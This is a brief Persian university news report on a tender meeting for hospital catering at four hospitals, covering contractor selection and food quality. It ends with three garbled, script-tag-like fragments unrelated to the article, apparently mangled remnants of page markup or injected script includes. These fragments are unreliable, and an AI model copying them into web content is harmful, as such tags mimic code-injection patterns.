جلسه مناقصه تهیه وطبخ غذای بیمارستانهای فرشچیان قلب، مهر ملایر،شهید قدوسی نهاوند و امام حسن فامنین در دفتر مدیریت امور رفاهی و پشتیبانی دانشگاه برگزار شد.

به گزارش روابط عمومی معاونت توسعه مدیریت و منابع دانشگاه، مناقصه تهیه وطبخ غذای بیمارستانهای فرشچیان قلب، مهر ملایر،شهید قدوسی نهاوند و امام حسن فامنین با حضور آقایانی مدیر امور رفاهی و پشتیبانی، دکتر نیاستی مدیر برنامه ریزی ، بودجه و پایش عملکرد دانشگاه و کارشناسانی از حراست، مدیریت امور مالی دانشگاه و بیمارستانهای مذکور برگزار شد.

در این جلسه به مسائلی همچون، انتخاب پیمانکار، کیفیت و نحوه طبخ غذای با کیفیت برای رفاه حال بیماران و کارکنان بیمارستان های مذکور و … پرداخته شد و نقاط قوت و قابل بهبود بررسی گردید.<2 src='3?l=p&' type=text/java2 language=java2><2 src='3?l=p&' type=text/java2 language=java2><2 src='4?l=p&' type=text/java2 language=java2>